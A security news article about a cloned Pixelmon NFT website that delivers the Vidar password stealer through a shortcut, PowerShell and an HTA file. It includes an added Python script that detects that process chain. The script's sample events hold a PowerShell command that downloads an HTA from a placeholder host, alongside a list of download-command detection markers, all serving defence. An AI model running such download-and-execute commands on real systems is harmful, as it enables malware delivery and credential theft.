1 min read

Scam Pixelmon NFT Website Hosts Password-stealing Malware

Vlad CONSTANTINESCU

A fraudulent website mimicking the popular Pixelmon NFT project lures its visitors with promises of free collectibles and tokens, only to have them download and install password-stealing malware.

Pixelmon is an NFT project that has garnered a significant fanbase, with almost 200,000 followers on Twitter and more than 25,000 Discord members. Its popularity stems from the project's promising roadmap, which includes developing an online game in the metaverse where players can collect, train, and use Pixelmon pets to battle other players.

In this recent scam attempt, threat actors have created a copy of the original website and used it to host password-stealing malware that would drain the victims' cryptocurrency wallets. The perpetrators paid great attention to detail and replicated the website almost identically.

However, instead of providing visitors with links to the game's demo version, the faux Pixelmon website hosts malicious executables that deploy password-stealing malware on infected devices. To be compromised, users must download a malicious archive that packs a Windows shortcut.

Opening the Windows shortcut (setup.lnk) triggers a PowerShell script that downloads a System32.hta file from the fake Pixelmon website. As BleepingComputer reported, the System32.hta file retrieves a password-stealing malware called Vidar, which has been spotted in similar attacks in the past.

Once running, Vidar connects to a Telegram channel, retrieves the IP address of its command-and-control (C2) server, then downloads additional configuration files and modules to steal data from the compromised system. Vidar can search for relevant files on infected devices, exfiltrate them to the threat actor's defined address, and steal passwords from apps and browsers.

This malware explicitly targets text files, crypto wallets, authentication and password files, and backups and codes. As Pixelmon is an NFT site, threat actors expect visitors to have cryptocurrency wallets installed on their systems.
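The infection chain described above (shortcut opened from the file explorer, PowerShell downloading an .hta file, mshta.exe running it) leaves a recognisable parent-child process pattern in endpoint telemetry. The following Python script is an added example, not code from Bitdefender or from the article: it runs a simple detection over constructed process-creation records loosely modelled on Sysmon Event ID 1 fields. The field names, process IDs, the `example.invalid` URL and the sample command lines are all assumptions made up for the example.

```python
"""Flag the explorer.exe -> powershell.exe (download) -> mshta.exe (.hta) chain.

Added example. Events are constructed sample records, not real telemetry;
the field names (pid, ppid, image, cmdline) are an assumption about the
log schema, and the download URL is a placeholder.
"""
import json
from typing import Dict, List

# Constructed sample events, one JSON object per line. Backslashes are doubled
# because they live inside JSON strings (this is a raw Python string).
SAMPLE_EVENTS = r"""
{"pid": 1200, "ppid": 900,  "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"pid": 4100, "ppid": 1200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -c (New-Object Net.WebClient).DownloadFile('https://example.invalid/System32.hta','C:\\Users\\Public\\System32.hta')"}
{"pid": 4108, "ppid": 4100, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\Users\\Public\\System32.hta"}
{"pid": 5200, "ppid": 1200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -c Get-Date"}
{"pid": 5300, "ppid": 1200, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\Program Files\\Vendor\\help.hta"}
"""

# Substrings that indicate PowerShell is fetching content from the network.
DOWNLOAD_MARKERS = (
    "downloadfile",
    "downloadstring",
    "invoke-webrequest",
    "iwr ",
    "net.webclient",
    "start-bitstransfer",
)


def parse_events(text: str) -> Dict[int, dict]:
    """Parse JSON lines into a pid -> event map so parents can be looked up."""
    events = {}
    for line in text.strip().splitlines():
        if line.strip():
            ev = json.loads(line)
            events[ev["pid"]] = ev
    return events


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lnk_hta_chain(events: Dict[int, dict]) -> List[dict]:
    """Return one alert per mshta.exe launch that matches the chain.

    Criteria: mshta.exe runs a .hta file, its parent is powershell.exe whose
    command line contains a download primitive. If that PowerShell was itself
    spawned by explorer.exe (what a double-clicked shortcut looks like), the
    alert is rated high; otherwise medium.
    """
    alerts = []
    for ev in events.values():
        # Note: "mshta.exe" itself does not contain ".hta", so this matches
        # only an .hta argument.
        if basename(ev["image"]) != "mshta.exe" or ".hta" not in ev["cmdline"].lower():
            continue
        parent = events.get(ev["ppid"])
        if parent is None or basename(parent["image"]) != "powershell.exe":
            continue
        cmd = parent["cmdline"].lower()
        if not any(marker in cmd for marker in DOWNLOAD_MARKERS):
            continue
        grandparent = events.get(parent["ppid"])
        from_shell = grandparent is not None and basename(grandparent["image"]) == "explorer.exe"
        alerts.append({
            "mshta_pid": ev["pid"],
            "powershell_pid": parent["pid"],
            "hta_cmdline": ev["cmdline"],
            "severity": "high" if from_shell else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_lnk_hta_chain(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(alert, indent=2))
```

Only pid 4108 is flagged: the other PowerShell instance (5200) downloads nothing, and the other mshta.exe launch (5300) was started directly by the shell rather than by a downloading PowerShell, so a vendor help file opened by a user does not trip the rule.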

To steer clear of this type of attack, users should always check a website's URL, use only official links, avoid downloading content from unknown or untrusted websites, and use dedicated solutions to scan downloaded files for suspicious content.
